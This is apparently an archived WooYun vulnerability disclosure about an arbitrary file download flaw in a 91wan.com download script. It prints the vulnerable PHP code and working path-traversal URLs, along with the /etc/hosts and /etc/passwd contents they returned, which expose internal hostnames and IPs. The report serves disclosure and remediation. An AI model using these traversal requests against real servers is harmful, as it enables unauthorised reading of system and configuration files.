乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-05-21: 细节已通知厂商并且等待厂商处理中 2015-05-26: 厂商已经主动忽略漏洞,细节向公众公开
91wan某站点任意文件下载
任意文件下载:
http://lwjs.91wan.com/huodong/bizhi/download.php?f=../../../huodong/bizhi/download.php
源代码:
<?php $filename = $_GET['f']; $filepath = './desktop/'.$filename; $filename = rawurlencode($filename); if (file_exists($filepath)) { $filename = $filename ? $filename : basename($filepath); $filetype = trim(substr(strrchr($filename, '.'), 1)); $filesize = filesize($filepath); header('Cache-control: max-age=31536000'); header('Expires: '.gmdate('D, d M Y H:i:s', time() + 31536000).' GMT'); header('Content-Encoding: none'); header('Content-Length: '.$filesize); header('Content-Disposition: attachment; filename='.$filename); header('Content-Type: '.$filetype.'; charset=utf-8'); readfile($filepath); exit; }?>
读hosts:http://lwjs.91wan.com/huodong/bizhi/download.php?f=../../../../../../../etc/hosts
192.168.1.14 passport.91wan.com192.168.1.234 datacenter1.91wan.com192.168.1.235 datacenter2.91wan.com192.168.1.22 datacenter3.91wan.com192.168.1.23 datacenter4.91wan.com192.168.1.17 bbs.91wan.com192.168.1.14 login.91wan.com192.168.1.11 cms.weedong.com192.168.1.33 api.weedong.com192.168.1.15 pay.91wan.com121.10.246.156 center.yxwz.com115.182.57.148 91tool.lq.the9.com192.168.1.16 kf.91wan.com115.238.100.45 91wan.admin.mccq.com116.28.63.170 user.test.by.91wan.com
读passwd:
root:x:0:0:root:/root:/bin/bashbin:x:1:1:bin:/bin:/sbin/nologindaemon:x:2:2:daemon:/sbin:/sbin/nologinadm:x:3:4:adm:/var/adm:/sbin/nologinlp:x:4:7:lp:/var/spool/lpd:/sbin/nologinsync:x:5:0:sync:/sbin:/bin/syncshutdown:x:6:0:shutdown:/sbin:/sbin/shutdownhalt:x:7:0:halt:/sbin:/sbin/haltmail:x:8:12:mail:/var/spool/mail:/sbin/nologinnews:x:9:13:news:/etc/news:uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologinoperator:x:11:0:operator:/root:/sbin/nologingames:x:12:100:games:/usr/games:/sbin/nologingopher:x:13:30:gopher:/var/gopher:/sbin/nologinftp:x:14:50:FTP User:/var/ftp:/sbin/nologinnobody:x:99:99:Nobody:/:/sbin/nologinnscd:x:28:28:NSCD Daemon:/:/sbin/nologinvcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologinpcap:x:77:77::/var/arpwatch:/sbin/nologinrpc:x:32:32:Portmapper RPC user:/:/sbin/nologinmailnull:x:47:47::/var/spool/mqueue:/sbin/nologinsmmsp:x:51:51::/var/spool/mqueue:/sbin/nologinoprofile:x:16:16:Special user account to be used by OProfile:/home/oprofile:/sbin/nologinsshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologinntp:x:38:38::/etc/ntp:/sbin/nologindbus:x:81:81:System message bus:/:/sbin/nologinavahi:x:70:70:Avahi daemon:/:/sbin/nologinxfs:x:43:43:X Font Server:/etc/X11/fs:/sbin/nologinrpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologinnfsnobody:x:4294967294:4294967294:Anonymous NFS User:/var/lib/nfs:/sbin/nologinhaldaemon:x:68:68:HAL daemon:/:/sbin/nologinavahi-autoipd:x:100:104:avahi-autoipd:/var/lib/avahi-autoipd:/sbin/nologinsabayon:x:86:86:Sabayon user:/home/sabayon:/sbin/nologinwww:x:80:80::/home/www:/sbin/nologinnagios:x:500:500::/usr/local/nagios:/sbin/nologinmysql:x:501:501::/usr/local/mysql/var:/sbin/nologin91wan:x:502:502::/www/html/:/sbin/nologinsoft91wan:x:503:502::/www/html/soft.91wan.com:/sbin/nologinossec:x:504:503::/var/ossec:/sbin/nologin
参数过滤,不允许跨父目录
危害等级:无影响厂商忽略
忽略时间:2015-05-26 22:24
漏洞Rank:8 (WooYun评价)
2015-05-27:几天前已经看到漏洞,但由于与乌云的沟通问题,账号无法登陆,导致漏洞公开,感谢白帽子,漏洞已经修复。